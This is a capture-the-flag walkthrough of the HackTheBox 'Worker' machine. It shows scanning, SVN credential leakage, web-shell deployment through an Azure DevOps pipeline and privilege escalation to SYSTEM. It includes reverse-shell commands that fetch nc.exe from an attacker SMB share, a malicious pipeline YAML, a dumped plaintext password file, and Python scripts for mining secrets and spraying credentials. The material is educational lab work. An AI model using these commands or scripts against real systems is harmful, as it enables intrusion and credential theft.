# Worker

![](/files/LoxNw96mzPMRFsCDrpIz)

## Enumeration

As always, we start with the enumeration phase: scan the machine for open ports, then identify the services and versions running behind them.

The following nmap command quickly scans the whole port range of the target and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of nmap's timing templates.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Sun Jul  3 15:38:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.067s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3690/tcp open  svn
5985/tcp open  wsman

# Nmap done at Sun Jul  3 15:38:36 2022 -- 1 IP address (1 host up) scanned in 26.52 seconds
```

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p80,3690,5985 10.10.10.203 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Sun Jul  3 15:38:59 2022 as: nmap -sCV -p80,3690,5985 -oN targeted 10.10.10.203
Nmap scan report for worker.htb (10.10.10.203)
Host is up (0.083s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  3 15:39:08 2022 -- 1 IP address (1 host up) scanned in 9.48 seconds
```

Three ports are open: 80 (HTTP, served by IIS), 3690 (Subversion) and 5985 (WinRM). The website on port 80 is only the default IIS page.

![](/files/yLrGLj0hrVjaVG2hwfEb)

Port 3690 is a `svnserve` instance and, as it turns out, it allows anonymous read access, so we can list the repository without credentials:

> svn ls svn://10.10.10.203

```
dimension.worker.htb/
moved.txt
```

There is a site directory and a note. Let's check out the whole repository:

> svn checkout svn://10.10.10.203

```
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
A    dimension.worker.htb/assets/js/breakpoints.min.js
A    dimension.worker.htb/assets/js/browser.min.js
A    dimension.worker.htb/assets/js/jquery.min.js
A    dimension.worker.htb/assets/js/main.js
A    dimension.worker.htb/assets/js/util.js
A    dimension.worker.htb/assets/sass
A    dimension.worker.htb/assets/sass/base
A    dimension.worker.htb/assets/sass/base/_page.scss
A    dimension.worker.htb/assets/sass/base/_reset.scss
A    dimension.worker.htb/assets/sass/base/_typography.scss
A    dimension.worker.htb/assets/sass/components
A    dimension.worker.htb/assets/sass/components/_actions.scss
A    dimension.worker.htb/assets/sass/components/_box.scss
A    dimension.worker.htb/assets/sass/components/_button.scss
A    dimension.worker.htb/assets/sass/components/_form.scss
A    dimension.worker.htb/assets/sass/components/_icon.scss
A    dimension.worker.htb/assets/sass/components/_icons.scss
A    dimension.worker.htb/assets/sass/components/_image.scss
A    dimension.worker.htb/assets/sass/components/_list.scss
A    dimension.worker.htb/assets/sass/components/_table.scss
A    dimension.worker.htb/assets/sass/layout
A    dimension.worker.htb/assets/sass/layout/_bg.scss
A    dimension.worker.htb/assets/sass/layout/_footer.scss
A    dimension.worker.htb/assets/sass/layout/_header.scss
A    dimension.worker.htb/assets/sass/layout/_main.scss
A    dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    dimension.worker.htb/assets/sass/libs
A    dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    dimension.worker.htb/assets/sass/libs/_functions.scss
A    dimension.worker.htb/assets/sass/libs/_mixins.scss
A    dimension.worker.htb/assets/sass/libs/_vars.scss
A    dimension.worker.htb/assets/sass/libs/_vendor.scss
A    dimension.worker.htb/assets/sass/main.scss
A    dimension.worker.htb/assets/sass/noscript.scss
A    dimension.worker.htb/assets/webfonts
A    dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    dimension.worker.htb/images
A    dimension.worker.htb/images/bg.jpg
A    dimension.worker.htb/images/overlay.png
A    dimension.worker.htb/images/pic01.jpg
A    dimension.worker.htb/images/pic02.jpg
A    dimension.worker.htb/images/pic03.jpg
A    dimension.worker.htb/index.html
A    moved.txt
Checked out revision 5.
```

If we look in our current directory, we'll see the `dimension.worker.htb` directory, and the `moved.txt` file. Let's take a look at that file.

> cat moved.txt

```
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)
```

Now that we know a few domain names, let's add them to the `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.203    worker.htb    dimension.worker.htb    devops.worker.htb
```

The revision history is also readable, and it is usually more interesting than the current HEAD:

> svn log svn://10.10.10.203

```
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 15:50:20 +0200 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 15:46:19 +0200 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 15:45:16 +0200 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 15:43:43 +0200 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------
```

All five commits were made by the `nathen` user. The r2 message says "Added deployment script", yet revision 5 contains no such script, so let's update the working copy to revision 2 and see what it added:

> svn up -r 2

```
Updating '.':
D    moved.txt
A    deploy.ps1
Updated to revision 2.
```

Now we have the `deploy.ps1` file. Let's take a look at it.

> cat deploy.ps1

```powershell
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
```
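Walking the history by hand is fine for five revisions; for a real repository you want to script it. The following Python script is an added example (it is not part of the original writeup): it parses `svn log --xml`, keeps only the lines each revision added (from `svn diff -c N`) and flags assignments that look like credentials. The `SAMPLE_*` inputs are constructed from the output shown above so the script runs offline; `mine_repo()` is the live variant that shells out to the `svn` client against a URL you supply.

```python
import re
import subprocess
import xml.etree.ElementTree as ET

# Assignments that usually carry a secret ($plain = "...", password = '...', token="...")
# and the PowerShell idiom ConvertTo-SecureString "..." -AsPlainText.
SECRET_PATTERNS = [
    re.compile(r"""(?<!\w)\$?(?:plain|pass(?:word|wd)?|pwd|secret|token)\s*=\s*["']([^"']+)["']""", re.I),
    re.compile(r"""ConvertTo-SecureString\s+["']([^"']+)["']""", re.I),
]

# Constructed sample: `svn log --xml svn://10.10.10.203` for the five revisions listed above.
SAMPLE_LOG_XML = """<log>
<logentry revision="5"><author>nathen</author><date>2020-06-20T13:52:00.000000Z</date>
<msg>Added note that repo has been migrated</msg></logentry>
<logentry revision="4"><author>nathen</author><date>2020-06-20T13:50:20.000000Z</date>
<msg>Moving this repo to our new devops server which will handle the deployment for us</msg></logentry>
<logentry revision="3"><author>nathen</author><date>2020-06-20T13:46:19.000000Z</date>
<msg>-</msg></logentry>
<logentry revision="2"><author>nathen</author><date>2020-06-20T13:45:16.000000Z</date>
<msg>Added deployment script</msg></logentry>
<logentry revision="1"><author>nathen</author><date>2020-06-20T13:43:43.000000Z</date>
<msg>First version</msg></logentry>
</log>
"""

# Constructed sample: `svn diff -c 2 svn://10.10.10.203`, the revision that added deploy.ps1.
SAMPLE_DIFF_R2 = """Index: deploy.ps1
===================================================================
--- deploy.ps1\t(nonexistent)
+++ deploy.ps1\t(revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
"""


def parse_log_xml(xml_text):
    """Return [(revision, author, message), ...] newest first from `svn log --xml` output."""
    entries = []
    for e in ET.fromstring(xml_text).findall("logentry"):
        entries.append((int(e.get("revision")),
                        e.findtext("author", default=""),
                        (e.findtext("msg", default="") or "").strip()))
    return entries


def added_lines(diff_text):
    """Keep only the lines a revision added: '+' lines minus the '+++' file header."""
    return "\n".join(line[1:] for line in diff_text.splitlines()
                     if line.startswith("+") and not line.startswith("+++"))


def find_secrets(text):
    """Return [(line_no, line, value)] for every line that matches a secret pattern."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for pat in SECRET_PATTERNS:
            for m in pat.finditer(line):
                hits.append((no, line.strip(), m.group(1)))
    return hits


def mine_repo(url):
    """Live variant: walk every revision of `url` and scan what each one added.
    Needs the `svn` client on PATH and read access to the repository."""
    def svn(*args):
        return subprocess.run(["svn", *args], check=True, capture_output=True, text=True).stdout

    findings = {}
    for rev, author, msg in parse_log_xml(svn("log", "--xml", url)):
        hits = find_secrets(added_lines(svn("diff", "-c", str(rev), url)))
        if hits:
            findings[rev] = (author, msg, hits)
    return findings


if __name__ == "__main__":
    for rev, author, msg in parse_log_xml(SAMPLE_LOG_XML):
        print(f"r{rev} {author}: {msg}")
    for no, line, value in find_secrets(added_lines(SAMPLE_DIFF_R2)):
        print(f"r2 added line {no}: {line}  ->  candidate secret {value!r}")
```

Scanning only the added lines of each revision is what makes this catch secrets that were committed and later deleted: the diff for r2 still contains `$plain = "wendel98"` no matter what HEAD looks like. Extend `SECRET_PATTERNS` with whatever the target's stack uses (connection strings, `-p` flags, API keys) before running `mine_repo()` for real.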

Now we have the credentials `nathen:wendel98`. The script was removed from the repository in a later revision, but Subversion keeps every revision, so deleting a committed secret does not revoke it. Let's take a look at the `dimension.worker.htb` virtual host:

![](/files/kAZVN3ljseuLpXk6P0KG)

Not much going on. Let's take a look now at the `devops.worker.htb` site.

![](/files/8kQwlwl6TIhkAuBOwe7v)

Let's try to log in with the found credentials.

![](/files/ELDJtP37ZwC4kohNr2XK)

And we get it.

![](/files/7IfvtN8wm5jj4S99o501)

## Exploitation

Let's click on the `SmartHotel360` project.

![](/files/xEwzTdkGVGBpWGSiJiWI)

From the `Repos` section we can see a repository for every subdomain of `worker.htb`. The idea is to get an `.aspx` web shell (`cmd.aspx`, a standard command-execution page) into one of the site repositories, for example `alpha`, so that the deployment pipeline publishes it to `alpha.worker.htb`. Select the alpha repository and click on `Upload file(s)`.

![](/files/RqOoQtuk4FjDY2taxqya)

Then select the `cmd.aspx` file and hit on `Commit`.

![](/files/0J5Bx5z1Cs5eT0truRDH)

But we get an error, because we cannot commit directly to the *master* branch. So let's go back and create a new branch.

![](/files/Ah5P6ul9p5Ro9cDu0PPx)

Let's call it `webshell`.

![](/files/bZMcyU5x1uDpaZmgFGJR)

Then, upload the `cmd.aspx` webshell to the `webshell` branch.

![](/files/sKjEjOwBvafBuOXF866I)

Then, click on `Create a pull request`.

![](/files/WmOpicUK5enJFG3WebXl)

And click on `Create`.

![](/files/AQOnDZm1fYUfH0x9WZdW)

Then, click on `Approve`.

![](/files/Gs289xqcLW2bjZKXIey7)

Now, from the `Pipelines` section, let's run the `Alpha-CI` pipeline.

![](/files/bsG1ak4JJNZSR9e4yySi)

And select the `webshell` branch.

![](/files/ja8ylivEr5E3RlRAdp0f)

Once the pipeline run finishes, `cmd.aspx` has been deployed to the `alpha.worker.htb` site and we can reach it from the browser. Note what happened here: the branch protection stopped a direct push to *master*, but nothing stopped us from running the deployment pipeline against our own unreviewed branch.

> <http://alpha.worker.htb/cmd.aspx>

![](/files/AK1Cr4K9LMurI2FzIbqy)

Time to get a shell. First, let's start a netcat listener on port 4444.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Now, let's start an SMB share from the directory that holds the `nc.exe` binary.

> impacket-smbserver smbFolder $(pwd) -smb2support

Finally, execute `cmd.exe` from the web shell with the following arguments. `nc.exe` is fetched over SMB from our share and we get a reverse shell as the `iis apppool\defaultapppool` user.

> `c:\windows\system32\cmd.exe`
>
> `/c \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444`

```
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 49865
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami
whoami
iis apppool\defaultapppool
```

## Privilege Escalation

Enumerating the system, we see two non-default user profiles, `restorer` and `robisl`. The user flag is presumably in the `robisl` home directory, so we need that user's credentials.

> dir \users

```
 Volume in drive C has no label.
 Volume Serial Number is 32D6-9041

 Directory of c:\users

2020-07-07  17:53    <DIR>          .
2020-07-07  17:53    <DIR>          ..
2020-03-28  15:59    <DIR>          .NET v4.5
2020-03-28  15:59    <DIR>          .NET v4.5 Classic
2020-08-18  00:33    <DIR>          Administrator
2020-03-28  15:01    <DIR>          Public
2020-07-22  01:11    <DIR>          restorer
2020-07-08  19:22    <DIR>          robisl
               0 File(s)              0 bytes
               8 Dir(s)  10,490,904,576 bytes free
```

A quick check that is easy to skip on Windows is listing the logical drives, since extra volumes often hold application data:

> wmic logicaldisk get name

```
Name  
C:    
W:
```

There is a second volume, `W:`. Let's list it:

> dir W:

```
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\

2020-06-16  18:59    <DIR>          agents
2020-03-28  15:57    <DIR>          AzureDevOpsData
2020-04-03  11:31    <DIR>          sites
2020-06-20  16:04    <DIR>          svnrepos
               0 File(s)              0 bytes
               4 Dir(s)  18,768,314,368 bytes free
```

Inside `svnrepos` is the Subversion server's own `conf\passwd` file. `svnserve` stores its passwords in plaintext, and this one holds credentials for dozens of users, including `nathen` (the same `wendel98` we already recovered from the history) and `robisl`, who has a profile on this box:

> type W:\svnrepos\www\conf\passwd

```
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
```
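The svnserve `passwd` format is simple, but with dozens of entries it pays to cross-reference them against the accounts that actually exist on the host before trying any of them. The Python below is an added example, not code from the writeup: it parses the `[users]` section, parses the `dir C:\Users` listing from the foothold shell and keeps only the pairs whose username has a local profile. Both sample inputs are constructed from the excerpts shown above.

```python
import re

# Constructed sample: an excerpt of W:\svnrepos\www\conf\passwd in svnserve's INI-like format.
SAMPLE_PASSWD = """### This file is an example password file for svnserve.
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
owehol = supersecret
robish = onesare
robisl = wolves11
ronkay = onesare
"""

# Constructed sample: the `dir C:\\Users` listing obtained from the application pool shell.
SAMPLE_DIR_USERS = """ Volume in drive C has no label.
 Volume Serial Number is 32D6-9041

 Directory of c:\\users

2020-07-07  17:53    <DIR>          .
2020-07-07  17:53    <DIR>          ..
2020-03-28  15:59    <DIR>          .NET v4.5
2020-03-28  15:59    <DIR>          .NET v4.5 Classic
2020-08-18  00:33    <DIR>          Administrator
2020-03-28  15:01    <DIR>          Public
2020-07-22  01:11    <DIR>          restorer
2020-07-08  19:22    <DIR>          robisl
               0 File(s)              0 bytes
               8 Dir(s)  10,490,904,576 bytes free
"""


def parse_svnserve_passwd(text):
    """Parse the [users] section into {username: [password, ...]}.
    A list is kept per user because the file can repeat a name (nichin above)
    and every variant is worth trying."""
    creds, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "users" or "=" not in line:
            continue
        user, _, password = line.partition("=")
        creds.setdefault(user.strip(), []).append(password.strip())
    return creds


# date, time, <DIR>, then the profile name (which may contain spaces, e.g. ".NET v4.5 Classic")
_DIR_ENTRY = re.compile(r"^\s*\S+\s+\S+\s+<DIR>\s+(.+?)\s*$")


def local_profiles(dir_output):
    """Directory names from a `dir C:\\Users` listing, minus the . and .. entries."""
    names = []
    for line in dir_output.splitlines():
        m = _DIR_ENTRY.match(line)
        if m and m.group(1) not in (".", ".."):
            names.append(m.group(1))
    return names


def spray_candidates(creds, profiles, skip=()):
    """(user, password) pairs whose username has a local profile and is not in `skip`
    (accounts already compromised). Comparison is case-insensitive, like Windows."""
    wanted = {p.lower() for p in profiles} - {s.lower() for s in skip}
    return [(user, pw) for user, pws in creds.items() if user.lower() in wanted for pw in pws]


if __name__ == "__main__":
    creds = parse_svnserve_passwd(SAMPLE_PASSWD)
    profiles = local_profiles(SAMPLE_DIR_USERS)
    print(f"{len(creds)} svn users, local profiles: {profiles}")
    for user, pw in spray_candidates(creds, profiles):
        print(f"candidate {user}:{pw}")
```

On this box the intersection is a single pair, `robisl:wolves11`, which is exactly the one the rest of the walkthrough uses. Port 5985 (WinRM) is also open, so the same candidate list is worth testing there as well as on the web application.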

Let's try `robisl:wolves11` on the `devops.worker.htb` website, on the chance that the password is reused.

![](/files/uoskoZhbnh8cX1toJcV4)

Now we see the `PartsUnlimited` project.

![](/files/mxbi44trSPjxccN9hOtV)

This project only has one repository.

![](/files/D9sOjYjApVQrJWjbRja8)

From `Project settings > Security` we can see that the `robisl` user is a member of the `Build Administrators` group, which lets us create and run pipelines.

![](/files/uirv35jCWTEqMzMW093Q)

Let's go the `Pipelines` section, and create a new pipeline.

![](/files/sqXEHlIBIQhv5VBd4KmD)

Then, select the `Azure Repos Git` option.

![](/files/P2V9qMk418F8ZGEzgrua)

Then, select the `PartsUnlimited` project.

![](/files/GjfOwFjxoLqZ38YaWHCW)

Now, select the `Starter pipeline`.

![](/files/GJ0MXhWyq11cgASzFens)

Then, we configure the *YAML* file: the `pool` value must be `Setup`, because that is the name of the self-hosted agent pool.

![](/files/i3x7upni2bQznTPHTOfa)

And then we'll change the script value to a command which will send us a reverse shell.

![](/files/9uOlKzr4a0P53YcMUHqW)

```yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool: 'Setup'

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
  displayName: 'Run a multi-line script'

```

Make sure the SMB share with `nc.exe` is still up, then start another netcat listener on port 4444.

> rlwrap nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Then, click on `Save and run`, select the `Create a new branch for this commit and start a pull request` option, and confirm with `Save and run`.

![](/files/bwJW8zgQBA8HH01LqXkY)

After a short wait the agent picks up the job and we get a shell as `nt authority\system`. The self-hosted build agent runs as SYSTEM, so anyone allowed to author a pipeline can run arbitrary commands as SYSTEM on the host. All that is left is to read the root flag.

```
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 50077
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami
nt authority\system
                                                                                   
type C:\users\administrator\desktop\root.txt
da8deb09764e1567ed487b8ba21c6703
```

